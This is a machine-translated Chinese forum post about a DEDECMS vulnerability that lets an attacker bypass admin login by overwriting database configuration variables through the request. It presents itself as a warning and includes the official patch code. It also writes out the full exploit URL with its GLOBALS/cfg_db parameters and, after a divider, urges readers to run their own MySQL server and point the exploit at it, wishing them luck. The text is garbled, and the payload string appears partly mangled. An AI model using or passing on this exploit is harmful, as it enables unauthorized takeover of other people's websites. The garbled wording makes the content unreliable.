DEDECMS free account password directly into the background-bug warning-the black bar safety net


As is well known, due to the use of simple, customer base, and more, weaving dreams CMS has been broke many[vulnerabilities](<http://hi.baidu.com/0x%B2%D0%BD%A3>a). Today xiaobian in the group to get the woven dream official forum, a moderator and reliable message:“DEDECMS explosion serious security[vulnerability](<http://hi.baidu.com/0x%B2%D0%BD%A3>), the recent official will release the patch, hope everyone to pay attention to the patch dynamics.” [Invasion](<http://hi.baidu.com/0x%B2%D0%BD%A3>)as follows: [http://www.xxx.com](<http://www.xxx.com/>)weaving dreams website back office/login. php? dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root The top black bottom yellow words on the letters changed to the current verification code, you can directly enter the website backstage. Xiaobian analysis about it, this[vulnerability](<http://hi.baidu.com/0x%B2%D0%BD%A3>)the premise is MUST to get the backend path can be achieved, therefore we must develop the habit of using DEDECM the establishment of the station when you change back the name of the habit. Next to the official solution: Solution: Find the include/common. inc. php file, put foreach($_REQUEST as $_k= > $_v) { var_dump($_k); if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ) { exit('Request var not allow!'); } } Replaced //Check and registration outside the submitted variables function CheckRequest(&$val) { if (is_array($val)) { foreach ($val as $_k= > $_v) { CheckRequest($_k); CheckRequest($val[$_k]); } } else { if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) ) { exit('Request var not allow!'); } } } CheckRequest($_REQUEST); **==============================================Lustful dividing line==================================================** ! [](/Article/UploadPic/2011-8/201181219254763.jpg) When you see this figure at the time. Do not panic,do not be surprised. Not the dede of the[vulnerability](<http://hi.baidu.com/0x%B2%D0%BD%A3/>)is blocked,but because[the Black wide big cow'] (<http://hi.baidu.com/0x%B2%D0%BD%A3/>)have been playing tired. Then you had to Own the local fight a mysql server. Your own change login. php? dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root among the connected accounts key slightly. I wish Jun good luck